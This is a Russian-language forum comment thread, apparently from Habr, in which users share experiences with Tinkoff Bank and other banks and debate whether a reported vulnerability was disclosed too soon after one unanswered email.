12.08.2016 13:26Тсс, я сейчас вам открою тайну… не все пользуются iOS, где драконовские правила и тормозная модерация. Под Android обновления приложений прилетают быстро.
Ruckus
12.08.2016 15:21+1Я вам тайну открою, что если я пользуюсь iOS мне не важно как быстро проходит модерация под Android.
KivApple
12.08.2016 23:00+1Так речь то шла про высказывание о том, что кому-то прилетел багфикс приложения за час. Из высказывания не очевидно, что у этого кого-то был айфон, а заявлений о скорости фиксов багов вы не делали. Так что вполне возможен вариант, что у этого пользователя был Android и он говорит правду.
vikarti
13.08.2016 10:51под iOS есть такая вещь как https://rollout.io/ — специально предназначена для решения проблемы тормозной модерации.
aczkasow
12.08.2016 11:01У меня с Рокебанком только позитивный опыт.
Они были единственным банком который согласился сделать карту за 5 дней, и привезти её в определённое часовое окно (с 16:00-17:30), так как мне срочна была нужна российская карта, а я как раз узнал, что лечу в командировку в Москву (живу за пределами РФ).
После всей этой беды с банком партнёром, на следующий день поддержка сама написала мне и спросила адрес. На мои «да вы всё равно не отправите новую карту, я не в России», мне сказали «не переживайте, отправим». Через неделю у меня была новая карта, и на неё вернулись заблокированные деньги со старого счёта.
Так же два раза была ситуация когда местный банкомат банка ING не отдавал деньги с карты Рокетбанка, но блокировал их на счету. Первый раз после письма претензии на разблокирование ушло 30 дней, второй раз дней пять.areht
12.08.2016 16:27Тот же Тинькофф привозит карты чуть ли не завтра. Есть банки, что карты на месте эмбоссируют
inkvizitor68sl
13.08.2016 10:54+2Да-да. Предупредили.
На самом деле они запустили рассылку, одумались, «нажали ctrl-c» до окончания, а потом всем, кто получил первое письмо, прислали второе «всё хорошо, сидите спокойно».
А когда пришло письмо вида «чуваки, наш банк тю-тю уже точно» — то никаких денег снять-перевести уже нельзя было.
Как результат — я уже полгода не могу у них завести новую карту, чтобы забрать деньги со старой их «удобным способом» без стояния в очереди и заполнения бумажек.tears
15.08.2016 11:35А почему не можете? Плюс, на сайте АСВ написано, что старый способ (с бумажками через банки-агенты) работает
inkvizitor68sl
15.08.2016 11:38Ну процесс выглядит примерно так:
— народ, у меня приложение ваше не логинится.
— пришлите страницы паспорта такие-то и такие сканом
— держите.
— вот ещё такая нужна
— держите
<проходит месяц>
— у меня приложение всё ещё не работает
— пришлите страницы паспорта такие-то (те же).
Сейчас вот по пятому кругу отправлять буду, если найду в себе силы без мата написать.
punkkk
12.08.2016 14:32+1Пользовался тремя банками и ни один мне в лицо не плевал. Даже о Тинькоффе слышал только положительные отзывы от родственников.
areht
12.08.2016 16:22Могу предположить, что для полноты опыта надо чаще пользоваться. Не у всех каждый день с плевками…
punkkk
12.08.2016 17:08Регулярно пользуюсь. Родня Тинькоффа вообще боготворит и хвастает банком.)
areht
12.08.2016 17:19Ну, к тинькоффу лично у меня тоже претензий не много. Но у него тоже бывают те ещё закидоны, вроде отключения дистанционного обслуживания некоторым людям.
Naps
12.08.2016 19:34Ага, помню. А когда им в суде выдают постановление возобновить обслуживание, они отказываются его выполнять.
kromm
11.08.2016 22:54+17Зря вы так, на самом деле банк очень хороший, остальные порой еще хуже.
Раньше им вообще альтернатив не было по клиентоориентированности, поэтому лояльных клиентов у них очень много, я в том числе, уже пятый год подряд.
SoluS
12.08.2016 08:11+6Банк, в первую очередь финансовая организация, а уже потом клиентоориентированный технологичный стартап. Она сначала про деньги, а только потом про общительную техподдержку и аякс запросы.
И когда эта финансовая организация платит проценты по вкладу только спустя год и только по суду, то это, на мой взгляд, должно ставить крест на всём остальном.
Acuna
12.08.2016 00:43+1Ну лично мой друг пользуется так как бесплатно имеет там Visa Platinum Premier (да, это та легендарная черная лакшери Виза). Я даже не спрашиваю как, для меня Тиньков останется Тиньковым даже с такими условиями. Это наверное какие-то попытки хоть как-то подсахарить своих клиентов, ибо частично вижу как такими картами расплачиваются на кассах чуть ли не бабушки. Стал думать как такое может быть, ибо… ну ибо Visa Platinum Premier же. Дак вот когда однажды при мне ее достал мой друг, разумеется сразу спросил у него, мол, как же так, растет благосостояние русского народа? А оказывается нет, все как всегда…
Frankenstine
12.08.2016 09:33Стал думать как такое может быть
Всё течёт, всё меняется. Например, в украинском Приватбанке пару лет назад все кредитки и дебетки Mastercard выдавались всем исключительно Gold, даже если получатели никогда и не слышали про какой-то там Gold-клуб. А сейчас они вроде переходят на простые карты от Visa…
yoshitoshi
12.08.2016 10:15+1Дебетовая Gold в Сбере стоит 3500 в год. К обычной кредитке Тинькова бесплатно дают хорошую страховку. К Gold кредитке Райффайзена — тоже дают страховку. Карты Platinum во многих банках стали доступнее, а где-то чуть ли не бесплатно, если ты держишь у них некий остаток.
Все меняется, банки заинтересованы в клиентах.Acuna
12.08.2016 13:04-4Ах вот оно что! Даже не знал о таком, благодарю! Ну вроде бы да, с одной стороны все меняется к лучшему, однако на мой взгляд такие изменения — показатель того, что все просто обесценивается, и если раньше такие карточки были действительно показателем успеха, то теперь они превратились просто в куски пластика, которые имеют все. Просто не буду греха таить, у меня имеются некоторые собственные критерии того, что я считаю показателем статуса и успеха в жизни, сюда же входит и такое абстрактное понятие, как элитные банковские карты, которые по сути являются куском пластика и сами по себе определяют статус ее владельца исключительно по стоимости ее годового обслуживания. Раньше определяли. Теперь и они стали сродни репликам дорогих часов, когда можно даже скелетоны (это когда кишки наизнанку) купить на Али за пять баксов, причем реально хорошие копии. Мельчаем…
Newbilius
12.08.2016 13:28+1Ага, нормальные услуги доступны всем подряд. Не попонтуешься, ужас то какой!
Acuna
12.08.2016 14:01-2Пожалуйста, не путайте маменькиных сынков богатых родителей и людей, которые добились всего в жизни сами и могут себе позволить иметь вещи классом выше, чем у остальных. Между двумя этими категория огромная пропасть. Есть хорошее выражение: «Хочешь иметь это — работай для этого. Все просто». Если по каким-то причинам не можешь — значит честно осознавай и принимай свои способности.
P. S. Самому еще в жизни добиваться и добиваться, так что заведомо скажу, что мне в этом вопросе можете не завидовать.
P. P. S. У всех совершенно разное понимание успеха в жизни, поэтому я сразу сказал, что это мое личное мнение, я его не лоббирую и никак не продвигаю.Ruckus
12.08.2016 15:35+1Мне интересно чего по вашему мнению можно будет добиться в жизни, когда вещи высшего класса будут доступны большинству?
На например iPhone и вообще техника Apple когда-то была показателем «статуса», часы, машины, кредитные карты, костюмы.
Сейчас же все это доступно с уровнем дохода не сильно выше среднего и я даже не против. Более того — знаком с людьми, которые имеют огромные для моего скромного понимания доходы, какие-то связи и спокойно ходят в шортах и шлепках, катаются на не очень дорогих (в пределах миллиона) машинах и от обычного прохожего их отличить сложно.
Мое мнение — статус — это твоя «важность» в обществе и отношение людей к тебе.Acuna
12.08.2016 15:42-2Еще раз хотел бы повториться, что у меня имеются некоторые собственные критерии того, что я считаю показателем статуса и успеха в жизни. В данном случае «iPhone и вообще техника Apple» в этот список не входят, так как имеются уже у всех, начиная от дворников и заканчивая президентами, поэтому мой список постоянно меняется, что произошло и с Visa Platinum в том числе, о чем я и писал, собссно, выше. Мне даже неловко просить читать мои комменты внимательнее, ибо понимаю, что, возможно, они не стоят этого, однако иногда я бы это делать рекомендовал бы, чтобы не отвечать на одни и те же вопросы. Имею честь.
Acuna
12.08.2016 15:44-1Мое мнение — статус — это твоя «важность» в обществе и отношение людей к тебе.
А вот тут Вы правы! Нет, серьезно) Просто некоторым приятно само осознание обладания некоторыми вещичками, недоступными большинству. Это как членство в анаморфном клубе масонов)
yoshitoshi
12.08.2016 15:34Карта «Премьер» в среднем стоит 5000 в год, или бесплатно, если держать «остаток» 2.5млн. Я бы не назвал это таким уж доступным предложением :-)
И, кстати, Вы все ещё можете мечтать об AmericanExpress Centurion.
Она уж точно никогда не будет дешеветь :-)ColorPrint
12.08.2016 23:41Сбербанк перестанет принимать Амекс как эквайер с 18 августа во всех точках )
а учитывая что большинство POS-терминалов в России обслуживает Сбер — карта превратится в тыкву (
navion
12.08.2016 22:03Страховка точно даётся к бесплатному голду?
В Авангарде давно их раздают при определённом обороте, но без страховки.
grossws
16.08.2016 02:34Страховка обычно выдаётся к MC World, а не к Gold. Покрытие такой страховки должно быть не меньше какого-то порога по правилам МПС. Порог не помню, у Авангарда было 60k euro.
Ходили слухи, что у Тинькоффа Tinkoff Black (дебетовые, на карте написано MC Platinum) они на самом деле MC World и можно получить страховку. Не проверял соответствует ли действительности. В ИБ, вроде, пункт "страховка" позволял купить страховку отдельно, приложением к карте не видел.
AMIluvatar
11.08.2016 21:59+9В этом банке весьма неплохая условно бесплатная дебетовая карта с кучей плюшек, до недавних пор были весьма вкусные проценты по вкладам. Да и обслуживание на высшем уровне. Кредитный отдел и остальные — 2 огромные разницы словно.
А вот по теме — косяк неприятный на мой взгляд, надеюсь, что починят.
ПС. На счет ужасов их нового ИБ. Мобильный банк зато просто отличный (по крайней мере на яблочном телефоне). Очень удобно.
edogs
11.08.2016 23:40+29подождите ка минуточку, это тот банк, который написал интересную клаузу всем френдам одного товарища в контактике, который что то там по кредиту просрочил? Он, да? И вы у него счет держите? Серьезно?
Мы сейчас непопулярный вещь скажем, но у ТКС есть 2 типа клиентов.
Кредитные — которые воют от ставок по кредитам и от последствий просрочек.
И дебитные — которые ставят ТКС небольшой нерукотворный памятник за выгодные условия по депозитам и картам.
Одно понятно связано с другим — не была бы жесткой политика ТКС к кредитчикам — не кормил бы он так депозитчиков.
Справедливости ради надо заметить, что ТКС и депозитчиков попробовал нагнуть слегка (урезав бонусы и проценты по уже открытым вкладам), но в суде его нагнули обратно, так что все ровно:)
У ТКС бесплатная карта с пейвейфом, бесплатный межбанк с огромными лимитами, 100% удаленное обслуживание (включая доставку карты на дом), разные акции (сейчас 3 месяца действует 5% кэшбек в супермаркетах и т.д.), вполне приличный ИБ в котором можно сделать все что нужно, бесплатное снятие бабла в банкоматах, бесплатный кард2кард, бесплатные переводы на ТКС из многих банков (через оплату кредитов) и т.д. и т.п., но остановимся, т.к. не хочется превращать это в панегерик:)
Можно конечно включить песню «ай банк поступил не хорошо», а можно просто получать выгоду от его использования. Первое это эмоции, второе это прагматизм, а поскольку мы на хабре, а не на тинейджерском форуме, то наверное логично выбрать второе:)
Если хотите поговорить про плохие банки — погуглите АРКС, раздолье еще то.asmrnv777
12.08.2016 13:24Мне, кстати, дебетовую карту бесплатно поменяли, когда я им просто позвонил и сказал, что она пришла в не очень симпатичный вид (цифры и изображения затерлись). Хотя до окончания срока действия по их правилам замена карты платная. Так что к дебетовым клиентам у них и правда отношение отличное.
Ну и плюс их саппорт, отдельная тема — отвечают всегда моментально, был только один случай, когда я провисел на линии больше 10 секунд (правда, это было эпично — 54 минуты я ждал ответа), но там, насколько помню, что-то серьезное приключилось, и, видимо, колл-центр нехило так загрузился.ColorPrint
12.08.2016 23:43Мне, кстати, дебетовую карту бесплатно поменяли, когда я им просто позвонил и сказал, что она пришла в не очень симпатичный вид (цифры и изображения затерлись). Хотя до окончания срока действия по их правилам замена карты платная. Так что к дебетовым клиентам у них и правда отношение отличное.
обходится выпуском бесплатной допки )
ColorPrint
12.08.2016 23:42Мы сейчас непопулярный вещь скажем, но у ТКС есть 2 типа клиентов.
Кредитные — которые воют от ставок по кредитам и от последствий просрочек.
И дебитные — которые ставят ТКС небольшой нерукотворный памятник за выгодные условия по депозитам и картам
я и тем, и другим пользуюсь, и вполне доволен.
грейс по кредиткам никто не отменял, равно как и кэшбэк )
aezhko
12.08.2016 00:20Думаю, банк просто продал кредит коллекторам. Куча банков продают кредиты коллекторам, и многие коллекторы пишут друзьям в ВК, уже сталкивался. Кажется, отделу взысканий самого тиньков банка тратить время подобным образом просто не выгодно.
mihmig
12.08.2016 08:15+1В школе с первого класса надо так:
Итак, дети, записывайте:
1. Переходить дорогу только на зелёный свет
2. Регистрироваться в соцсетях/мессенджерах/банках — только на дополнительную симкарту.staticlab
12.08.2016 09:55+53. Не забывайте раз в 3 месяца вставлять дополнительную симкарту в телефон и делать на ней платные операции, чтобы её не закрыли и номер не ушёл неизвестно кому.
Enterindead
12.08.2016 10:12+2А можно первый и второй пункт по подробнее? Бывает, и светофора рядом нет, и симки две иметь не всегда бывает удобно.
mihmig
12.08.2016 13:11Закрывать дверь на ключ и ставить машину на сигнализацию тоже неудобно.
Неудобно также потом после кражи денег с карты бегать по банкам и отделениям полиции — бумажки собирать.
vlivyur
12.08.2016 14:16Первый пункт не работает при отсутствии светофора. Второй пункт отлично помогает при паранойе, а уж удобно/не удобно тут вообще дело десятое.
aezhko
12.08.2016 12:10+2Я не имею опыта столкновений с коллекторами, но мне не кажется, что регистрация аккаунта в соц. сети на другой номер телефона чем-то поможет. Заемщик предоставляет в банк огромное количество документов, и если у него таки есть аккаунт в соц. сети, то найти его не сложно. Проще уж вообще соц. сетями не пользоваться.
Возвращаясь к вопросу школы: я бы скорее добавил в школьный курс обучение минимальной экономической грамотности, где человеку явно объясняли бы, к каким проблемам приводят кредиты, и что их лучше не брать вообще, если нет совсем острой необходимости (например, на лечение) или планов за счет кредитных денег заработать. Да и вообще про различные экономические инструменты рассказать не лишним было бы, наверное.norlin
12.08.2016 12:28+6я бы скорее добавил в школьный курс обучение минимальной экономической грамотности
Вы ещё предложите про налоги в школе рассказывать. Совсем экстремизм получится.
ploop
12.08.2016 12:50+1бы скорее добавил в школьный курс обучение минимальной экономической грамотности
Полностью согласен. И ещё немного юридической грамотности. А то такое ощущение, что у нас народ только вчера из леса вышел, дальше обсуждения на лавочках как всё плохо дело не движется. А любая попытка защитить свои права, как ни странно, приводит к успеху.
zirix
12.08.2016 20:02А вы уверены что банк имеет юридическую возможность продать кредит/долг?
Часто под видом коллекторов звонят посторонние люди т.е. мошенники с «предложением» кидать деньги на их счет.aezhko
12.08.2016 20:14На скорую руку нашел договор Тинькова, вот выдержка оттуда:
… Клиент соглашается,
что Банк вправе передавать и раскрывать
любую информацию, касающуюся Клиента,
аффилированным лицам, агентам и партнерам,
а также иным третьим лицам, включая
кредитные бюро и коллекторские агентства...zirix
12.08.2016 23:18Тут только передача информации. Продать долг используя этот пункт банк не может.
aezhko
13.08.2016 01:44Конечно, я скинул первое, что нашел в гугле. Но зачем пункт про передачу данных в договоре, если они не собираются продавать кредиты? Вообще, для продажи кредита разве нужно разрешение?
Я в этом деле не эксперт, но мне всегда казалось, что продажа кредита коллекторскому агентству — распространенная практика. Буду рад, если вдруг кто-то раскроет это детальнее.
eugzol
12.08.2016 09:19+2Ваша история, кажется, про любой банк :) В котором люди и держат деньги для того, чтобы получить на них доход за счёт тех людей, что у банка деньги взяли в долг. Вот если кредитные клиенты, нарушившие условия, начинают хвалить банк, тогда точно пора сваливать.
dmitry_dvm
12.08.2016 09:20+2Пользуюсь только дебетовой картой. Отличный банк, по условиям всякие втб и сберы рядом не валялись.
Rampages
12.08.2016 11:26+1Этот банк предложил мне оформить кредитную карту, а после того как получили мои данные, мне пришел отказ, хотя вначале уверяли, что мол уже одобренная и это просто формальность. Вот так потратил около 30 минут своего драгоценного времени, а теперь еще незнаю как их заставить удалить мои персональные данные.
Было это года 2 назад, с тех пор звонили мне пару раз, но я уже их грубо посылаю куда подальше чего и вам советую.ploop
12.08.2016 11:32пришел отказ, хотя вначале уверяли, что мол уже одобренная и это просто формальность
Это маркетинг.
Реальная кредитная карта это то же самое, что кредит, когда проводится стандартная проверка и одобрение. Просто так, без вашего согласия, никто не будет её делать, а после ваши данные проверку не прошли. Увы.
Lorien_Elf
14.08.2016 14:30Не только. Он каким-то образом узнает телефоны соседей по лестничной клетке и им звонит.
m0xf
11.08.2016 21:44+2Можно генератор номеров карт сделать. В номере карты всего 9 значащих знаков (остальное BIN и контрольная сумма). Учитывая, что банк недавно хвастался 1 000 000 дебетовых карт, то верная комбинация будет в среднем каждые 1000 попыток. Именно поэтому для безопасности всегда проверяют полные реквизиты карты.
Flammar
12.08.2016 14:36В 1990-е я слышал про трату денег со случайных чужих карт, номера и какие-то коды (PIN или CVV/CVC, не помню) которых получались с помощью генераторов.
kolabaister
11.08.2016 21:56Работает. Чисто ради интереса — нет ли статистики проверок вашим сервисом?
kromm
11.08.2016 22:00Статистику — в каком плане? Сколько у народа в среднем денег на картах?:) Нет, зачем.
Скрипт под спойлером — тот самый, что и на хостинге, просто от мусора подчищенный.kolabaister
11.08.2016 23:06Нет конечно, такую инфу я бы хранить не стал)
Разумеется, кому надо — те и сами скрипт запустят. А те, кто просто захотел проверить, прочитав статью (как я), наверняка воспользуются вашим готовым вариантом. Вот количество таких проверок и было интересно.
pansa
11.08.2016 21:56+7А как долго вы ждали ответа банка и было ли подтверждение, что ваше сообщение вообще получено (не улетело в спам, принято в обработку)?
Warezovvv
11.08.2016 22:15+6Работаю в одном здании с Тинькофф, могу завтра сходить, тыкнуть носом в этот пост.
kromm
11.08.2016 22:19+20Отписал им в понедельник, сразу как обнаружил. Никакой реакции абсолютно не было.
Если ИБ не смотрит в спам — это какая-то неправильная ИБ, кмк.ChALkeRx
11.08.2016 22:29-39Вы написали одно письмо, подождали три дня, не дождались реакции, и радостно побежали это публиковать?
Naps
11.08.2016 22:40+39А сколько нужно времени, что бы прочитать письмо, проверить и ответить? Месяц? Год?
ChALkeRx
11.08.2016 22:44+4Если целью действительно является устранение уязвимости и минимизация вреда, то следующий шаг — попытка установить контакт по другим каналам, с вопросом о том, получили ли они письмо, как скоро на него ответят, и куда вообще надо было слать сообщения об уязвимостях. Причём без указания деталей уязвимости обычному саппорту — во-первых, это не их дело, во-вторых, они неадекваты и не умеют оценивать опасность. Достаточно писать, что вы переслали детали по специальному адресу или требовать с них чтобы вам дали этот специальный адрес.
Адекватно и быстро хорошо если каждые десятые реагируют, по моему опыту.
iqiaqqivik
12.08.2016 11:12+15WhiteHats нигде и никогда не заинтересованы в устранении уязвимости и минимизация вреда для б?а?н?к?а?.
Минимизация вреда для пользователя — вот основная цель. Для ее достижения обычно используется один из следующих вариантов:
1. (лучший, наиболее эффективный) у банка есть прямая линия и прозрачный фонд вознаграждения за найденные уязвимости: нашел ? сообщил ? закрыли ? получил денег.
2. (приемлемый) банк о?п?е?р?а?т?и?в?н?о? стремительно реагирует на такие письма, даже если они отправлены с адреса pink_poopsey_2001@pornhub.com
3. (обычный) банк телится ? ждем сколько умеем (скажем, день, или три) и публикуемся везде, поднимая себе карму. Банк расплачивается репутацией и возмещает убытки всем пострадавшим.
Игр в коммунизм не бывает: если банк такой банк, то его надо нагнуть по максимуму при первой же возможности. Иначе мы продолжим жить там, где живем.ChALkeRx
12.08.2016 12:06WhiteHats нигде и никогда не заинтересованы в устранении уязвимости и минимизация вреда для б?а?н?к?а?.
Минимизация вреда для пользователя — вот основная цель.
Безусловно, про минимизацию вреда для пользователей речь и идёт.
То есть на самом деле всё чуть-чуть сложнее, но в первом и во втором приближениях это так.
(обычный) банк телится ? ждем сколько умеем (скажем, день, или три)
Игр в коммунизм не бывает: если банк такой банк, то его надо нагнуть по максимуму при первой же возможности. Иначе мы продолжим жить там, где живем.
Я понимаю вашу позицию, но мне кажется, что публикация через три дня и одно письмо — всё-таки несколько перегибание палки. Учитывая то, что пользователи могут пострадать от этой уязвимости.
То, что у вас описано как п.3. обычно вступает в силу тогда, когда уязвимая сторона либо активно не желает исправлять проблему, либо достаточно длительное время игнорирует все попытки с ней связаться. Отправка одного письма, неполучение на него ответа, и выводы из этого «ой, всё» — так себе стратегия.
Хотя как Tinkoff мог бы это улучшить и вообще избежать этой ситуации — отправлять автоматический ответ вида «ваше сообщение рассматривается нашей командой, мы с вами свяжемся».
даже если они отправлены с адреса pink_poopsey_2001@pornhub.com
Да, придирки к адресу я видел — с тем, что на это должно быть наплевать — соглашусь, конечно.
ChALkeRx
12.08.2016 12:11Ещё раз — я не защищаю банк в данной ситуации, и в целом с описанными вами целями согласен.
Но, по моим оценкам, предпринятые автором действия были сильно неоптимальными именно с точки зрения минимизации вреда для пользователей.
iqiaqqivik
12.08.2016 12:22Тут мы натыкаемся на проблему курицы и яйца.
Пока нашедший уязвимость будет предпринимать все попытки достучаться до банка через приватные каналы, писать, звонить, купит билет в Москву, приедет в офис, поживет на крыльце недельку, добьется встречи с безопасником, сумеет его убедить, пешком уйдет к себе во Владивосток, потому что жить неделю на крыльце банка — дорого…
Короче, пока вот это все — банк будет относиться к проблеме именно так, как он относится сейчас. Результат публикации тут налицо: все закрыто. Еще раз повторю: вред, нанесенный пользователям, в конечном итоге можно вытребовать через суд у того же банка (да, я все понимаю, но все же).
Пока их не пнешь, они не полетят.ChALkeRx
12.08.2016 12:35Пока нашедший уязвимость будет предпринимать все попытки достучаться до банка через приватные каналы, писать, звонить, купит билет в Москву, приедет в офис, поживет на крыльце недельку, добьется встречи с безопасником, сумеет его убедить, пешком уйдет к себе во Владивосток, потому что жить неделю на крыльце банка — дорого…
Вы слегка утрируете =). В данной ситуации стоило позвонить и написать ещё и в поддержку (без указания деталей).
Результат публикации тут налицо: все закрыто
Закрыто через полдня после публикации. Все, кто хотели что-то стрясти через эту дыру — стрясли. Чтобы убедиться в обратном, надо поднимать логи на стороне банка. Как вы его заставите это сделать, кстати говоря? Сказать, что это уже не ваши проблемы — не получится, так как вы уже надели на себя шляпу и действуете исходя из минимизации вреда для пользователей, а часть из этого могло случиться именно из-за такой публикации — значит это входит в интегральную оценку.
Еще раз повторю: вред, нанесенный пользователям, в конечном итоге можно вытребовать через суд у того же банка
Не весь вред, плюс маловероятно в наших условиях, плюс не все пострадавшие вообще захотят этим заниматься, но это не значит, что они пострадают меньше. Кстати, они вообще могут не знать, что пострадали — как они тогда в суд пойдут?
Короче, пока вот это все — банк будет относиться к проблеме именно так, как он относится сейчас.
Пока их не пнешь, они не полетят.
Знаете, от этого достаточно повышать прозрачность пост-фактум, публикуя таймлайн, краткую историю общения, и детали уязвимости после её исправления. Как обычно и делают в большинстве сколько-нибудь значимых случаев. И да, это почему-то совершенно отсутствует в вашей классификации.
iqiaqqivik
12.08.2016 17:00Это отсутствует в моей классификации потому же, почему в ней отсутствует пункт «прилетят инопланетяне и все починят». Чтобы опубликовать что-то пост-фактум, необходимо, хотя бы, чтобы фактум наступил. Иначе Ахиллес на черепаху не наступит никогда.
Представители банка уже: прислали дискутировать какого-то недотепу и выложили не то письмо. То, что письмо не то, было понятно сразу: автор того не стал бы писать о нем на хабр в таком тоне ни при каких обстоятельствах. Плюс банальный лингвистический анализ.
Есть шанс, что я ошибаюсь, и топикстартер просто идиот (и шикарный стилист), но что-то мои поверхностные знания о банках (вы можете прощелкать до моего профиля в SO и посмотреть, где я работаю) говорят об обратном.
ChALkeRx
12.08.2016 17:16Представители банка уже: прислали дискутировать какого-то недотепу и выложили не то письмо.
Согласились, но на момент диалога выше это было неясно.
Представители банка уже: прислали дискутировать какого-то недотепу и выложили не то письмо. То, что письмо не то, было понятно сразу: автор того не стал бы писать о нем на хабр в таком тоне ни при каких обстоятельствах.
Вы, вот, тоже посылаете противоречивые сигналы — из одних сообщений кажется, что вы разочаровались в людях, из других — что нет =).
мои поверхностные знания о банках (вы можете прощелкать до моего профиля в SO и посмотреть, где я работаю) говорят об обратном.
Эх. Я, к сожалению, примерно представляю, что в банках происходит, да. Но я видел и ещё менее адекватную реакцию, но это всегда в конце концов заканчивалось более или менее нормально.
iqiaqqivik
12.08.2016 17:31Вы, вот, тоже посылаете противоречивые сигналы — из одних сообщений кажется, что вы разочаровались в людях, из других — что нет =).
В людях — никогда. В банках — давно.
Я, к сожалению, примерно представляю, что в банках происходит, да.
Дык ну вот. Я и говорю, что их надо пинать, нагибать и чморить. Если бы речь шла про интернет-магазин «Кройки и шитья», я бы никогда не встал на сторону топикстартера.
ChALkeRx
12.08.2016 22:51В людях — никогда. В банках — давно.
Но это же тоже люди =). И на ваши письма у них там люди отвечают.
Если бы речь шла про интернет-магазин «Кройки и шитья», я бы никогда не встал на сторону топикстартера.
Это очень радует, кстати. Но в вашей классификации выше вы про это ничего не указали, и я думал, что вы её ко всему относите.
Я и говорю, что их надо пинать, нагибать и чморить.
Без предыстории всё-таки не стоит заранее делать выводы, тем более что автор к этому банку, вроде, изначально хорошо относился. Стоит оценивать только потенциальную пользу/вред, причём тот факт, что это банк, для меня бы эту оценку не сдвинул так сильно, чтобы публиковать детали неисправленной уязвимости через три дня и одно письмо.
С другой стороны, например, http://adios-hola.org/ я полностью поддерживаю — вот их надо «чморить». Это ребята, у которых бизнес-модель — ботнет, плюс жутко дырявый. При этом они врут пользователям и до скандала вообще не писали нигде, что продают трафик через компьютеры пользователей. Вот эту штуку никак реально не исправить, и единственное, что можно сделать — активно предостерегать всех от её использования, вообще.
ChALkeRx
12.08.2016 14:20+1WhiteHats
Это (в данном случае) что угодно, но не White Hat.
Прочитайте письмо: https://habrahabr.ru/post/307628/#comment_9748658
kromm
12.08.2016 15:46+2Прежде чем делать выводы стоит дождаться комментариев обеих сторон. Когда меня просили разрешения на публикацию письма, никакой конкретики не было, и я был уверен что опубликуют правильное. А опубликовали какую-то чушь:)
ChALkeRx
12.08.2016 16:35Если вы посылали несколько писем, и это не то, или если письмо зацитировали не полностью — извините. Серьёзно.
Вы можете выложить правильную версию с текстом и указанием, куда оно было отправлено?
UPD: https://habrahabr.ru/post/307628/#comment_9749060, вижу.
Да, тут я был неправ, да и сотрудники банка, кажется поторопились. Или они это специально?
pansa
11.08.2016 22:58+1В вашем случае наиболее близкий ответ — месяц. Точнее, даже 6. Для примера, правила одного из самых популярных ресурсов: https://hackerone.com/disclosure-guidelines Заметьте, речь идет об открытой официальной BB.
ChALkeRx
11.08.2016 23:39+3У меня к вам два вопроса.
- У вас есть опыт сообщения об уязвимостях в разные фирмы?
- Каковы должны были быть правильные мотивы человека, сообщающего об уязвимости? Пожалуйста, подумайте, прежде чем ответить.
Superl3n1n
12.08.2016 11:03+1Хоть вопрос адресован и не мне, но я могу на него ответить:
- 1.) Имеется (хотя это и не важно). И не все адекватно реагируют на ту информацию, которую ты им предоставил. Часто тебя еще и пытаются сделать виноватым в том что ты нашел дырку. По этому, если каждый владелец сайта реагирует на уведомление о дырке по разному, почему тогда тот, кто уведомляет не может также по разному реагировать на игнорирование его уведомления?
- 2.) Мотив всегда один. Получить благодарность за проделанную работу и проявленную гражданскую позицию. При чем, компенсация не всегда соизмерима с найденной уязвимостью, но это уже совсем другой вопрос.
ChALkeRx
11.08.2016 23:07+5Так. Объяснюсь: по моему опыту этого явно недостаточно. Очень часто приходится долбать по нескольким каналам, при этом часто — объяснять, почему так делать нельзя.
Безусловно, банк должен был ответить сразу и адекватно. Но то, что он этого не сделал — не повод сразу же публиковать детали уязвимости.
Если человек действительно ставил целью исправить ситуацию и действовал из лучших побуждений, то его действия должны были быть не такими, как здесь. Я про это написал выше. Я не теоретизирую, реально мало кто отвечает так быстро, плюс первый ответ очень часто бывает неадекватен.
Например, в прошлом месяце я, не найдя нормального контакта безопасности у фирмы и не дождавшись ответа на security@, долбал эту фирму по нескольким другим независимым каналам, включая обычную службу поддержки клиентов (каковым я не являлся) и нескольких отдельных разработчиков. Это помогло, со мной связались безопасники. Все остались довольны.
pansa
12.08.2016 00:06+1Не могу плюсануть, но поддержу и, дабы не просто так — расскажу как я тоже выходил на контакт =)
Уязвимость заключалась в ошибке конфигурации серверной части, что позволило найти тестовые стенды одной весьма крупной студии сайтов. А у них там в исходниках страницы была ссылка на txt-шник со списком должностей, имен и фамилий всех участников — от дизайнера до сисадмина. Нашел админа в какой-то социалке, постучался, рассказал. Вроде закрыли. =) До этого писал вроде как владельцу компании, и он даже ответил, но толку недели 2-3 не было. Так что так, да.ChALkeRx
12.08.2016 02:01Вот это нормально =).
Нашел админа в какой-то социалке, постучался, рассказал.
Это, кстати, довольно действенный метод. С той фирмой я приблизительно таком образом и связался в итоге.
Другой пример — у того же Travis, например, я не нашёл публичной информации о том, куда слать сообщения о уязвимостях, в итоге стряс её с разработчика в личке на твиттере. Кстати, с ними было приятно работать и они всё весьма хорошо делали.
Исправили за несколько дней, но там были дополнительные шаги по перепроверке с разных сторон (затронут был не только Travis), и в итоге публично я это через три месяца почти выложил. И это — нормально, примерно так обычно и бывает.
Humbucker
12.08.2016 10:31Писали тому админу с реальной своей страницы в соцсети? Или не рисковали? ;)
WitcherGeralt
12.08.2016 11:03Всё правильно он сделал, если они не чешутся, надо их пнуть.
Несколько месяцев я назад заказал дополнительную карту к основной, но мне внезапно потребовалось перевыпустить основную (дополнительная даже ещё не успела придти). Перевыпустил, основная пропала из интерфейса, появилась новая, а дополнительная к старой всё так и висит с тех пор и в мобильном приложении, и в web-интефейсе. На запрос я получил ответ, что удалить карту невозможно. Самому пинать их лень, да и повод никчёмный.
ChALkeRx
12.08.2016 14:19+1Поправка: он написал одно письмо на ящик credit@tinkoff.ru (который, опять же, скорее всего, читает только общая линия поддержки, без каких-либо деталей (это, кстати, правильно, учитывая ящик), но с очень толстым намёком на то, что он бы не прочь получить денег и «обсудить предложения о сотрудничистве» (цитата).
Источник: https://habrahabr.ru/post/307628/#comment_9748658.
Если там письмо автора зацитировано некорректно или неполно, то беру свои слова (из этого сообщения) назад.Superl3n1n
12.08.2016 14:31но с очень толстым намёком на то, что он бы не прочь получить денег
Т.е. программа Bug Bounty это хорошо, а вот желать получить вознаграждение это плохо?
ChALkeRx
12.08.2016 16:47Так, я не могу отредактировать, но я отзываю этот комментарий целиком. Банк, оказывается, зацитировал не то письмо, вообще не от автора.
Правильное: https://habrahabr.ru/post/307628/#comment_9749060
pansa
11.08.2016 22:29+14Вы молодец, что нашли ошибку. Но вы очень поторопились с публикацией. Не защищая банк, а просто исходя из реалий даже открытых bug bounty программ.
dbanet
12.08.2016 06:45+11Полностью поддерживаю. Комментаторы утверждают, что тупить полгода с закрытием уязвимости — обычное дело; соглашусь и посмею воспользоваться этим как аргументом в пользу публикации уязвимостей гораздо раньше печально принятой нормы.
Бестолковость надо наказывать.
